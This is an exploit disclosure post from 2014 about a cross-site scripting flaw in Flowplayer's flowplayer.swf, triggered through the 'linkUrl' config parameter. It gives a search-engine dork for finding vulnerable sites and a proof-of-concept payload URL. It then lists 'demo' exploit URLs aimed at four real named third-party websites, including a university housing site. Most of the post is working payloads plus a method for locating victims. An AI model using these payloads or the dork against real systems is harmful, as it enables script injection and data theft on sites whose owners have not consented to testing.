facebook facebook twitter rss

Flowplayer (js & swf) XSS Vulnerability

Author: Muhammad Adeel , Published: 15-05-2014
# Flowplayer (js & swf) XSS Vulnerability
# Date: 15/5/14
# Vulnerablity Risk : High
# Vulnerable Sofware: http://flowplayer.org/
# Dork : inurl:flowplayer/flowplayer.swf
# Author: Muhammad Adeel aka Innoxent Stoker
# Founder | Urdusecurity.blogspot.com

# Vulnerability

xss is Cross Site Scripting vuln Which actually interacts With Either WebServer or The Clients and its Highly Dangrous Vuln Because it May Lead to Data Stealing and Other Stuff Like That.

# POC & Exploit

xss is in flowplayer.swf Config Command Which is Executing xss while Giving "linkUrl" ParaMeter


http://Vulnerablesite.com/flowplayer.swf?config={"clip":{"url":"http://stream.flowplayer.org/bauhaus/624x260.mp4", "linkUrl":"javascript:confirm(String.fromCharCode(88,83,83));"}}&.swf


# Demo

http://www.advancementprojectca.org/sites/all/modules/flowplayer/flowplayer/flowplayer.swf?config={"clip":{"url":"http://stream.flowplayer.org/bauhaus/624x260.mp4", "linkUrl":"javascript:confirm(String.fromCharCode(88, 115, 115, 32, 80, 111, 99, 32, 47, 32, 77, 117, 104, 97, 109, 109, 97, 100, 32, 65, 100, 101, 101, 108, 32, 97, 107, 97, 32, 73, 110, 110, 111, 120, 101, 110, 116, 32, 83, 116, 111, 107, 101, 114, 32, 47, 47, 32, 85, 114, 100, 117, 83, 101, 99));"}}&.swf


http://www.dancelessonsaustin.com/template/fredwoodlands/js/flowplayer/flowplayer.swf?config={%22clip%22:{%22url%22:%22http://stream.flowplayer.org/bauhaus/624x260.mp4%22,%20%22linkUrl%22:%22javascript:confirm%28String.fromCharCode%2888,%20115,%20115,%2032,%2080,%20111,%2099,%2032,%2047,%2032,%2077,%20117,%20104,%2097,%20109,%20109,%2097,%20100,%2032,%2065,%20100,%20101,%20101,%20108,%2032,%2097,%20107,%2097,%2032,%2073,%20110,%20110,%20111,%20120,%20101,%20110,%20116,%2032,%2083,%20116,%20111,%20107,%20101,%20114,%2032,%2047,%2047,%2032,%2085,%20114,%20100,%20117,%2083,%20101,%2099%29%29;%22}}&.swf


http://www.tier1personnel.com/template/default/js/flowplayer/flowplayer.swf?config={%22clip%22:{%22url%22:%22http://stream.flowplayer.org/bauhaus/624x260.mp4%22,%20%22linkUrl%22:%22javascript:confirm%28String.fromCharCode%2888,%20115,%20115,%2032,%2080,%20111,%2099,%2032,%2047,%2032,%2077,%20117,%20104,%2097,%20109,%20109,%2097,%20100,%2032,%2065,%20100,%20101,%20101,%20108,%2032,%2097,%20107,%2097,%2032,%2073,%20110,%20110,%20111,%20120,%20101,%20110,%20116,%2032,%2083,%20116,%20111,%20107,%20101,%20114,%2032,%2047,%2047,%2032,%2085,%20114,%20100,%20117,%2083,%20101,%2099%29%29;%22}}&.swf


https://housing.wwu.edu/include/flowplayer/flowplayer.swf?config={%22clip%22:{%22url%22:%22http://stream.flowplayer.org/bauhaus/624x260.mp4%22,%20%22linkUrl%22:%22javascript:confirm%28String.fromCharCode%2888,%20115,%20115,%2032,%2080,%20111,%2099,%2032,%2047,%2032,%2077,%20117,%20104,%2097,%20109,%20109,%2097,%20100,%2032,%2065,%20100,%20101,%20101,%20108,%2032,%2097,%20107,%2097,%2032,%2073,%20110,%20110,%20111,%20120,%20101,%20110,%20116,%2032,%2083,%20116,%20111,%20107,%20101,%20114,%2032,%2047,%2047,%2032,%2085,%20114,%20100,%20117,%2083,%20101,%2099%29%29;%22}}&.swf

Like us on Facebook :